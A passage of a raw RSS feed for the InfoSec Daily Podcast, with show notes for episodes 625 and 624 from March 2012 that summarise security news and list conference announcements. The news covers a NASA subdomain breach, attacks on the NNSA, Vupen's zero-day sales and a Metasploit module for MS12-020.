<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://news.softpedia.com/news/NASA-s-Air-Traffic-Conflict-Resolutions-Site-Hacked-by-Black-Jester-Exclusive-260088.shtml"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.softpedia.com/news/NASA-s-Air-Traffic-Conflict-Resolutions-Site-Hacked-by-Black-Jester-Exclusive-260088.shtml</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Black Jester, the Sudanese hacker known for personally going to a United Nations office to inform them of vulnerabilities that affected one of their sites, returns. This time he managed to breach a subdomain owned by NASA, more precisely the one that belongs to Air Traffic Conflict Resolutions (airtrafficconflictresolutions .arc.nasa.gov).</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;A lot of hackers hacked NASA in someway and leaked info or databases, so I thought that they have no security, so I found that domain unpatched for SQLi, and tried to exploit it. It&rsquo;s just a shame for NASA not to patch there networks after all those incidents,&rdquo; the hacker told us.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As a result of the hack, Black Jester leaked some</span><a href="http://pastebin.com/iV52tXSk"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">sample information</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> from their servers, just to prove that he gained access.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;The Pastebin document I made contains the target link, and the credential for the server with their hashed passwords so that skids don&rsquo;t hack it immediately. Also the databases I got from the server,&rdquo; he explained.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;I could do more damage but I think my point has been received. Also, just because it&rsquo;s a sub-domain, but that doesn&rsquo;t mean they are protected.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If on previous occasions he alerted companies of security holes that affected their public websites, this time he said that he didn&rsquo;t notify them because he was disappointed of the way he was treated whenever he tried to help.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://news.softpedia.com/news/Up-to-5-Million-Computers-May-Be-Exposed-to-RDP-Attack-259578.shtml"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span></a><a href="http://www.usnews.com/news/articles/2012/03/20/us-nukes-face-up-to-10-million-cyber-attacks-daily"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.usnews.com/news/articles/2012/03/20/us-nukes-face-up-to-10-million-cyber-attacks-daily</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The computer systems of the agency in charge of America&#39;s nuclear weapons stockpile are &quot;under constant attack&quot; and face millions of hacking attempts daily, according to officials at the National Nuclear Security Administration.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thomas D&#39;Agostino, head of the agency, says the agency faces cyber attacks from a &quot;full spectrum&quot; of hackers.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;They&#39;re from other countries&#39; [governments], but we also get fairly sophisticated non-state actors as well,&quot; he said. &quot;The [nuclear] labs are under constant attack, the Department of Energy is under constant attack.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A spokesman for the agency says the Nuclear Security Enterprise experiences up to 10 million &quot;security significant cyber security events&quot; each day.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Of the security significant events, less than one hundredth of a percent can be categorized as successful attacks against the Nuclear Security Enterprise computing infrastructure,&quot; the spokesman said&mdash;which puts the maximum number at about 1,000 daily.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The agency wants to beef up its cybersecurity budget from about $126 million in 2012 to about $155 million in 2013 and has developed an &quot;incident response center&quot; responsible for identifying and mitigating cyber security attacks.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://news.softpedia.com/news/Up-to-5-Million-Computers-May-Be-Exposed-to-RDP-Attack-259578.shtml"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span></a><a href="http://www.forbes.com/sites/andygreenberg/2012/03/21/meet-the-hackers-who-sell-spies-the-tools-to-crack-your-pc-and-get-paid-six-figure-fees/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.forbes.com/sites/andygreenberg/2012/03/21/meet-the-hackers-who-sell-spies-the-tools-to-crack-your-pc-and-get-paid-six-figure-fees/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">At a Google-run competition in &shy;Vancouver last month, the search giant&rsquo;s famously secure Chrome Web browser fell to hackers twice. Both of the new methods used a rigged &shy;website to bypass Chrome&rsquo;s security protections and completely hijack a target computer. But while those two hacks defeated the company&rsquo;s defenses, it was only a third one that actually managed to get under Google&rsquo;s skin.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A team of hackers from French security firm Vupen were playing by different rules. They declined to enter Google&rsquo;s contest and instead dismantled Chrome&rsquo;s security to win an HP-sponsored hackathon at the same conference. And while Google paid a $60,000 award to each of the two hackers who won its event on the condition that they tell Google every detail of their attacks and help the company fix the vulnerabilities they had used, Vupen&rsquo;s chief executive and lead hacker, Chaouki Bekrar, says his company never had any intention of telling Google its secret techniques&mdash;certainly not for $60,000 in chump change.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;We wouldn&rsquo;t share this with Google for even $1 million,&rdquo; says Bekrar. &ldquo;We don&rsquo;t want to give them any knowledge that can help them in fixing this exploit or other similar exploits. We want to keep this for our customers.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Those customers, after all, don&rsquo;t aim to fix Google&rsquo;s security bugs or those of any other commercial software vendor. They&rsquo;re government agencies who &shy;purchase such &ldquo;zero-day&rdquo; exploits, or hacking techniques that use undisclosed flaws in software, with the &shy;explicit &shy;intention of invading or disrupting the computers and phones of crime suspects and intelligence targets.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://news.softpedia.com/news/Up-to-5-Million-Computers-May-Be-Exposed-to-RDP-Attack-259578.shtml"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span></a><a href="http://threatpost.com/en_us/blogs/exploit-ms12-020-rdp-bug-moves-metasploit-032012"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://threatpost.com/en_us/blogs/exploit-ms12-020-rdp-bug-moves-metasploit-032012</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As the inquiry into who</span><a href="http://threatpost.com/en_us/blogs/ms12-020-rdp-code-leak-mystery-deepens-microsoft-remains-silent-031612?utm_source=Threatpost&amp;utm_medium=Left+Sidebar&amp;utm_campaign=Most+Commented"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">leaked the proof-of-concept exploit code for the MS12-020 RDP flaw</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> continues, organizations that have not patched their machines yet have a new motivation to do so: A Metasploit module for the vulnerability is now available. </span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It&#39;s been a week now since Microsoft released a patch for the RDP bug and the exploit code that was included with the information the company sent to its partners in MAPP (Microsoft Active Protections Program) was found in an exploit on a Chinese download site shortly thereafter. Luigi Auriemma, the researcher who discovered and reported the vulnerability to Microsoft through the TippingPoint Zero Day Initiative, said that the packet found in the exploit code that leaked was a direct copy of the one he submitted with his bug report. </span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Officials at ZDI said that they are certain that the code did not leak from their organization. Microsoft officials have said little more than to acknowledge that there seems to be a leak from somewhere within MAPP. The company has not indicated whether that was on their end or from one of the MAPP members. </span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Now, there is a working exploit committed to the</span><a href="http://www.metasploit.com/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Metasploit Framework</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, which is a typically a good indicator that attacks are about to ramp up. Brad Arkin, head of product security and privacy at Adobe, said in a talk recently that when there&#39;s a newly public vulnerability in one of the company&#39;s products, the attacks start with a trickle against high value targets and then increase sharply from there.</span></p>
<p dir="ltr" style="margin-left: 27pt;margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">This module exploits the MS12-020 RDP vulnerability originally discovered and reported by Luigi Auriemma. The flaw can be found in the way the T.125 ConnectMCSPDU packet is handled in the maxChannelIDs field, which will result an invalid pointer being used, therefore causing a denial-of-service condition.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://news.softpedia.com/news/Up-to-5-Million-Computers-May-Be-Exposed-to-RDP-Attack-259578.shtml"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span></a><a href="http://www.securitypark.co.uk/security_article267380.html"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitypark.co.uk/security_article267380.html</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">With more than 50,000 new malware samples attacking the Internet daily and hackers becoming more and more sophisticated &ndash; tracking online behavior, monitoring social networks and developing new forms of cyber criminality every year &ndash; computer users must take measures to protect themselves online. And Comodo, a leading Internet security provider, wants to help them do just that.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Now, Comodo Security Solutions is embarking on a campaign to give both consumers and businesses educational information in the form of informative blogs at Blogs.comodo.com and via tips on Facebook and Twitter as well as through educational videos.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">For example, Comodo&#39;s educational campaign will explore many Internet-related problems facing both businesses and individuals, ranging from solutions that increase web site traffic to ways Android users can defeat malware attacks.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">For years, Comodo has challenged the Internet security industry, calling on vendors to stop selling cleaning software as protection. Unlike other Internet security companies, Comodo&#39;s solutions reject weak conventional strategies such as blacklisting known threats. Comodo&#39;s solutions use a more advanced white list strategy that actually prevents infections.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Comodo also uses Default Deny prevention technology that stops even new threats before they can cause damage to a computer, isolating suspicious files so they cannot cause harm &ndash; unlike the Default Allow approach used by other Internet security vendors that address the problem only after a system is infected.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-625-nasa-10mil-attacks-daily-vupen-msf-ms12-020-and-comodo-consumer-advocacy/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3668/0/infosec-daily-podcast-episode-625.mp3" length="17297745" type="audio/mpeg" />
		<itunes:duration>0:35:59</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 625 for March 21, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Dr. Bonez.
&#160;
Announcements:
InfoSec Southwest
	When: March 30-April 1
	Where: Austin, TX
	http://www.In[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 625 for March 21, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Dr. Bonez.
&#160;
Announcements:
InfoSec Southwest
	When: March 30-April 1
	Where: Austin, TX
	http://www.Infosecsouthwest.com
&#160;
Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
&#160;
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#160;- Huntington, West Virginia
	http://www.appyide.org/
&#160;
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014
	&#160;
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
http://www.social-engineer.com/social-engineer-training
&#160;
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
&#160;
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
&#160;
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
&#160;
You don't have a sufficient version of Flash Player to display this animation.
&#160;
Stories
Source: &#160;http://news.softpedia.com/news/NASA-s-Air-Traffic-Conflict-Resolutions-Site-Hacked-by-Black-Jester-Exclusive-260088.shtml
Black Jester, the Sudanese hacker known for personally going to a United Nations office to inform them of vulnerabilities that affected one of their sites, returns. This time he managed to breach a subdomain owned by NASA, more precisely the one that belongs to Air Traffic Conflict Resolutions (airtrafficconflictresolutions .arc.nasa.gov).
&#160;
&#8220;A lot of hackers hacked NASA in someway and leaked info or databases, so I thought that they have no security, so I found that domain unpatched for SQLi, and tried to exploit it. It&#8217;s just a shame for NASA not to patch there networks after all those incidents,&#8221; the hacker told us.
As a result of the hack, Black Jester leaked some sample information from their servers, just to prove that he gained access.
&#8220;The Pastebin document I made contains the target link, and the credential for the server with their hashed passwords so that skids don&#8217;t hack it immediately. Also the databases I got from the server,&#8221; he explained.
&#8220;I could do more damage but I think my point has been received. Also, just because it&#8217;s a sub-domain, but that doesn&#8217;t mean they are protected.&#8221;
If on previous occasions he alerted companies of security holes that affected their public websites, this time he said that he didn&#8217;t notify them because he was disappointed of the way he was treated whenever he tried to help.
&#8230;
Source: &#160;http://www.usnews.com/news/articles/2012/03/20/us-nukes-face-up-to-10-million-cyber-attacks-daily
The computer systems of the agency in charge of America&#39;s nuclear weapons stockpile are &#34;under constant attack&#34; and face millions of hacking attempts daily, according to officials at the National Nuclear Security Administration.
Thomas D&#39;Agostino, head of the agency, says the agency faces cyber attacks from a &#34;full spectrum&#34; of hackers.
&#34;They&#39;re from other countries&#39; [governments], but we[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 624 &#8211; SSO fails, Card Cloning Case, UR0B0R0X 20, Pwnage Monitoring and Ban Lifted</title>
		<link>http://www.isdpodcast.com/episode-624-sso-fails-card-cloning-case-ur0b0r0x-20-pwnage-monitoring-and-ban-lifted</link>
		<comments>http://www.isdpodcast.com/episode-624-sso-fails-card-cloning-case-ur0b0r0x-20-pwnage-monitoring-and-ban-lifted#comments</comments>
		<pubDate>Wed, 21 Mar 2012 00:43:49 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3662</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 624 for March 20, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik ,and Dr. Bonez. &#160; Announcements: How to Rob a bank in 30 days When: March 20th, 2012 Where: http://securityzone.co/webinar-en.html &#160; InfoSec Southwest When: March 30-April 1 Where: Austin, TX http://www.Infosecsouthwest.com &#160; Linuxfest Northwest 2012 When: Saturday, April [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 624 for March 20, 2012. &nbsp;</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik ,and Dr. Bonez.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">How to Rob a bank in 30 days </span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 20th, 2012</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: </span><a href="http://securityzone.co/webinar-en.html"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://securityzone.co/webinar-en.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Southwest<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 30-April 1<br class="kix-line-break" /><br />
	Where: Austin, TX<br class="kix-line-break" /><br />
	</span><a href="http://www.infosecsouthwest.com/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.Infosecsouthwest.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012<br class="kix-line-break" /><br />
	Where: Bellingham Technical College &#8211; Bellingham, WA<br class="kix-line-break" /><br />
	</span><a href="http://www.linuxfestnorthwest.org/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012<br class="kix-line-break" /><br />
	Where: MU Forensic Science Center &nbsp;- Huntington, West Virginia<br class="kix-line-break" /><br />
	</span><a href="http://www.appyide.org/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.appyide.org/</span></a></p>
<p>&nbsp;</p>
